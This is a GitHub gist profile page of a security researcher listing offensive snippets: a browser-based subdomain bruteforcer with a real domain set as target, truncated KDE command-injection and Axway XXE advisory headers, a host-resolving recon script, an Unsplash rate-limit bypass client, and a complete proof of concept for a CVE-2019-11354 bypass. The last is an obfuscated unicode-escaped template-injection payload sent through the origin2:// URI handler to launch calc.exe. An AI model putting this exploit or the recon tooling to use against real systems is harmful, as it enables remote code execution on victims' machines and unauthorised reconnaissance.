Skip to content

Instantly share code, notes, and snippets.

👻
Writing scary code.

zer0pwn zeropwn

👻
Writing scary code.
Block or report user

Report or block zeropwn

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@zeropwn
zeropwn / run.js
Created Aug 8, 2019 — forked from marzavec/run.js
Browser-based subdomain bruteforcing using DNS over HTTP(s) (DoH)
View run.js
/*
Developer: Marzavec ( https://github.com/marzavec )
Description: A simple browser-based subdomain bruteforcing script, using DoH providers. Developed as a 5 minute hack, just to see it's preformance. Many improvements could be made, such as adding error handling or informing the user when the script is done.
Usage: Open the browsers dev console (usually F12), paste this script, change the `rootTld`, press enter to run. Ezpz.
*/
const rootTld = 'lyka.pro'; // change to your target's root tld
// url to newline seperated wordlist
const wordlistUrl = 'https://raw.githubusercontent.com/rbsec/dnscan/master/subdomains.txt';
@zeropwn
zeropwn / kde-kdesktopfile-command-injection.txt
Created Aug 5, 2019
KDE 4/5 is vulnerable to a command injection vulnerability in the KDesktopFile class.
View kde-kdesktopfile-command-injection.txt
_ _
_______ _ __ ___ | | ___ | |
|_ / _ \ '__/ _ \ | |/ _ \| |
/ / __/ | | (_) || | (_) | |
/___\___|_| \___(_)_|\___/|_|
https://zero.lol
zero days 4 days
Title: KDE 4/5 KDesktopFile Command Injection
Date: July 28th 2019
@zeropwn
zeropwn / Axway SecureTransport 5.x Unauthenticated XXE
Last active Jul 23, 2019
Axway SecureTransport 5.x Unauthenticated XML Injection / XXE
View Axway SecureTransport 5.x Unauthenticated XXE
_ _
_______ _ __ ___ | | ___ | |
|_ / _ \ '__/ _ \ | |/ _ \| |
/ / __/ | | (_) || | (_) | |
/___\___|_| \___(_)_|\___/|_|
https://zero.lol
zero days 4 days
ATTENTION:
@zeropwn
zeropwn / spyse-resolve.sh
Last active Jun 21, 2019
Resolve all hosts returned by spyse.
View spyse-resolve.sh
#!/bin/bash
# requires
# https://github.com/zeropwn/spyse.py
DOMAINS_LOC=/tmp/subdomains.txt
spyse -target $1 -param domain --sub > $DOMAINS_LOC;
domains=`cat $DOMAINS_LOC | sed '1,12d'`
for d in $domains;
do
getent hosts $d | awk '{print $1}'
done
@zeropwn
zeropwn / unsplash.py
Created Jun 3, 2019
Non-Ratelimited Unsplash.com Image Search Client
View unsplash.py
#!/usr/bin/python3
import json
import requests
import argparse
import urllib.parse
SEARCH_URL = "https://unsplash.com/napi/search/photos"
p = argparse.ArgumentParser(description="Non-Ratelimited Unsplash API Client")
p.add_argument('-s', help="search query")
View CVE-2019-11354-BYPASS.html
<script>
// pop calc.exe
var payload = '%u007b%u007b%u0061%u003d%u0074%u006f%u0053%u0074%u0072%u0069%u006e%u0067%u0028%u0029%u002e%u0063%u006f%u006e%u0073%u0074%u0072%u0075%u0063%u0074%u006f%u0072%u002e%u0070%u0072%u006f%u0074%u006f%u0074%u0079%u0070%u0065%u003b%u0061%u002e%u0063%u0068%u0061%u0072%u0041%u0074%u003d%u0061%u002e%u0074%u0072%u0069%u006d%u003b%u0024%u0065%u0076%u0061%u006c%u0028%u0027%u0061%u002c%u004f%u0072%u0069%u0067%u0069%u006e%u002e%u0063%u006c%u0069%u0065%u006e%u0074%u002e%u0064%u0065%u0073%u006b%u0074%u006f%u0070%u0053%u0065%u0072%u0076%u0069%u0063%u0065%u0073%u002e%u0061%u0073%u0079%u006e%u0063%u004f%u0070%u0065%u006e%u0055%u0072%u006c%u0028%u0022%u0063%u0061%u006c%u0063%u002e%u0065%u0078%u0065%u0022%u0029%u002c%u0061%u0027%u0029%u007d%u007d';
window.location = 'origin2://game/launch?offerIds=0&title='+payload;
</script>
You can’t perform that action at this time.